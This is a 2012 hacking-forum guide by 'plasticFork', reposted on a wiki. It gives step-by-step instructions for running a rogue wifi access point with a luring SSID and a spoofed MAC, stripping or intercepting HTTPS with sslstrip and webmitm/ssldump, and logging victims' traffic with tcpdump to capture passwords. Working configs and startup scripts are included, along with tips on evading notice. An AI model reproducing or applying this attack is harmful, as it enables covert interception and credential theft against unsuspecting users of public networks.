Dsniff/PlasticForkGuide HackBB
From charlesreid1
Setting Up a Wifi Access Point and Dealing With SSL
Author: plasticFork
Date Released: 4/20/2012 - On HackBB.
Contents
Introduction
This is about setting up a wireless access point then recording all traffic that passes through it, including two ways of dealing with ssl. This guide was written for Linux but the basic principle will still apply to other platforms like BSD, just some of the commands will be different i.e. no iptables in BSD. There are probably other more advanced things you could do like modify the traffic passing through but I won't go into that. This is an alternative to arp-poisoning but achieves pretty much the same thing, or same state of affairs to be precise with traffic being passed through your machine. There are plenty of guides around for arp-poisoning but not so many for setting up access points. The parts about dealing with ssl traffic and logging traffic work exactly the same for arp-poisoning.
Hardware requirements
A wireless card for the access point and another network card for forwarding traffic to the internet, this can either be an ethernet or wireless connection they both work the same.
I'm not sure how "new" is "new" so you may have to do your own research to see if your wireless card is compatible. “All new mac80211 based drivers that implement AP functionality are supported with hostapd's nl80211 driver. “ http://linuxwireless.org/en/users/Documentation/hostapd
Setting up the AP
hostapd for turning the wireless card into an access point
dnsmasq for dhcp
iptables for nating
Traffic monitoring
Option one
sslstrip
tcpdump
Option two
webmitm (dsniff)
ssldump
Setting up the AP
First things first you need to connect your linux box to the internet. Like I mentioned before an ethernet or wireless connection work just fine. If you go for the wireless route you'll need two network cards, one for the access point and one for connection to the internet. The same card can't do both; that might sound obvious but you'd be surprised.... For the rest of this guide eth0 will be the interface connected to the internet, It's important you do this first, I had problems setting up the access point then connecting to the internet later.
Configuring stuff
hostapd
(host access point daemon)
This is a program that will turn your wireless card into an access point (I'll be using wlan0 for that). This is the part where you decide your network's ssid, encryption and password.
hostapd is configured with a file called /etc/hostapd/hostapd.conf
interface=wlan0 driver=nl80211 ssid=safe_free_public_wifi channel=8 wpa=3 wpa_passphrase=secret_password wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP TKIP hw_mode=g
You can leave off the 4 wpa... lines and it will just be an open access point, no password.
dnsmasq
This program will automatically assign ip addresses to the computers connecting to your ap. Without this the clients would need to set their own ip addresses which is not very windows friendly.
dnsmasq is configured with a file called /etc/dnsmasq.conf
This important fields to have in this file are
interface=wlan0 dhcp-range=192.168.0.50,192.168.0.150,12h dhcp-option=3,192.168.0.1
Note the ip address in the 3rd line need to be the ip of the access point, which we'll set later. 192.168.0.1 is a good one.
iptables
This will forward traffic from wlan0 to eth0. Replace eth0 with your internet facing interface. If you're unfamiliar with iptables you can run these 5 lines individually from the terminal or put them into a textfile and run it with "bash <filename>" We'll be putting all the required lines into a textfile like this later on for simple startup/shutdown of the access point. The iptable commands stack together so you can add even more later. To clear all the current rules use iptables -F
iptables -F iptables -t nat -F iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE echo 1 > /proc/sys/net/ipv4/ip_forward
Start up wlan0
I think assigning a specific ip address to wlan0 is important since I ran into trouble when I didn't. The industry standard is to use 192.168.x.x for internal ip addresses. I'll just use 192.168.0.1 This is also the time to set the access point mac address, either for anonymity reasons or to impersonate another access point. If you're making up your own mac address make sure the first block is even i.e. 10, 12, 14 ... 1A, 1C, 1E ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 hw ether 10:11:12:13:14:15 or simply just ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 Without the mac foolery.
Dealing with SSL
Of course you don't *have* to deal with ssl traffic you can just ignore it. But here are two ways of dealing with it
Method 1 sslstrip
Least conspicuous. This essentially redirects https traffic to http. The user may notice that a website does not say https in the address bar when it should and the browser may give a warning that the user is submitting non encrypted data so it's not completely invisible. However these are things most users ignore...
sslstrip is written in python so there's no need to compile it/find a precompiled binary. You can download it here www.thoughtcrime.org/software/sslstrip/
There is no need to configure sslstrip itself but you will need an extra iptable rule. All traffic bound for port 80 needs to be redirected to a port that sslstrip is listening on. Then sslstrip will do its magic.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
Then run it with
python sslstrip.py -l 9000 -f lock.ico </per> You can leave out the -f lock.ico. This is a cheap padlock favicon picture that will display in the victim's browser when they try to visit a https site (and sslstrip redirects it to the http version). Cute but it could also raise extra suspicion so use your own judgement. Note this does not work against every website. Torproject.org for example is unaffected. Also this trumps the httseverywhere add-on. ==Method 2 full fat man in the middle== This is generating a fake certificate, using that to encrypt/decrypt all ssl traffic. It's not as hard as it sounds but it comes with the major disadvantage that if you're making your own certificate web browsers like firefox will flag this up to the user and force them to go through a painstaking "add security exception" screen which is not very subtle at all and will frankly fail with a lot of targets. To do this we need an iptable rule, a program called ssldump and a program called webmitm, which is apart of a package called dsniff. <pre> iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT
Then run it with
webmitm -d
You'll be guided through making a certificate. The less believable your answers, the less believable your certificate.
ssldump -n -d -k webmitm.crt >> ssldump.log
Recording traffic
There are plenty of guides on how to do this with wireshark, tshark (wireshark cli if you're not running X) and tcpdump.
Here's a quick example of using tcpdump
tcpdump -i wlan0 -s 0 -Apnq >> logfile
-i wlan0 is the interface to listen to. You could also do eth0 but this will also capture packets originating from the machine the ap is running on.
-s 0 sets the default amount of data to capture per packet
-A outputs the data in ascii, which is useful if you're sniffing for login details
-p prevents the card from entering promiscuous mode This might not be needed but we don;t want to pick up traffic from other nearby access points.
-pn are just options to leave out some information we're not interested in.
There are also other tools available which will listen and parse out passwords and interesting things automatically. I'll admit I'm rather immaturely motivated by watching all of my victims traffic not just the passwords.
Startup/Shutdown Script
Script the startup and shutdown:
#!/bin/bash ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 dnsmasq iptables -F iptables -t nat -F iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE echo 1 > /proc/sys/net/ipv4/ip_forward hostapd -d /etc/hostapd/hostapd.conf & <pre> For sslstrip <pre> #!/bin/bash iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000 python sslstrip.py -l 9000 -f lock.ico & tcpdump -i wlan0 -s 0 -Apnq >> /home/plasticFork/logfile &
for webmitm
#!/bin/bash iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT webmitm -d ssldump -n -d -k webmitm.crt >> ssldump.log &
and here's a bring down script
#!/bin/bash ifconfig wlan0 down killall dnsmasq iptables -F killall hostapd killall sslstrip killall tcpdump killall webmitm killall ssldump